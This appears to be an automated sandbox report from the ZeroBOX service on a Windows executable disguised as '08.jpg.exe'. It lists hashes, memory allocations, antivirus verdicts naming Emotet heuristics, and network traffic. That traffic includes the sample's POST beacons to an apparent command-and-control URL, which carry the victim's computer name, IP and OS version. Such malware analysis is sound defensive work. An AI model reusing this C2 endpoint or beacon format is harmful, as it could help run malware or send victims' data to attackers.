Summary | ZeroBOX

08.jpg.exe

OS Processor Check PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6401 July 9, 2021, 6:10 p.m. July 9, 2021, 6:12 p.m.
Size 745.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ed1921467f6784af6bdca40a06a541b5
SHA256 3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6
CRC32 0107E600
ssdeep 12288:4AbvaOTfFGikmS6jd2QML8HXWp8KEwbHBkm9jjgbFHLViv0dC2x0uTadTaUk7u:vbvJfFGikmS0pXfw7Bkm9j088PlTaDj
PDB Path c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb
Yara
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • PE_Header_Zero - PE File Signature

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0
pdb_path c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb
suspicious_features POST method with no referer header suspicious_request POST http://sudepallon.com/8/forum.php
request GET http://api.ipify.org/
request POST http://sudepallon.com/8/forum.php
request POST http://sudepallon.com/8/forum.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 16384
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01071000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00250000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
domain api.ipify.org
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 0
family: 2
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0707in2_wvcr&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
1 1 0
MicroWorld-eScan Gen:Heur.Pack.Emotet.6
FireEye Generic.mg.ed1921467f6784af
McAfee Artemis!ED1921467F67
BitDefenderTheta Gen:NN.ZexaF.34790.Uu0@aO44wCdi
APEX Malicious
Paloalto generic.ml
BitDefender Gen:Heur.Pack.Emotet.6
Ad-Aware Gen:Heur.Pack.Emotet.6
Emsisoft Gen:Heur.Pack.Emotet.6 (B)
McAfee-GW-Edition BehavesLike.Win32.Rootkit.bh
Sophos ML/PE-A
Ikarus Trojan.Win32.Krypt
GData Gen:Heur.Pack.Emotet.6
Microsoft Program:Win32/Wacapew.C!ml
Cynet Malicious (score: 100)
ALYac Gen:Heur.Pack.Emotet.6
MAX malware (ai score=86)
SentinelOne Static AI - Suspicious PE
Cybereason malicious.67f678
Qihoo-360 HEUR/QVM20.1.72FB.Malware.Gen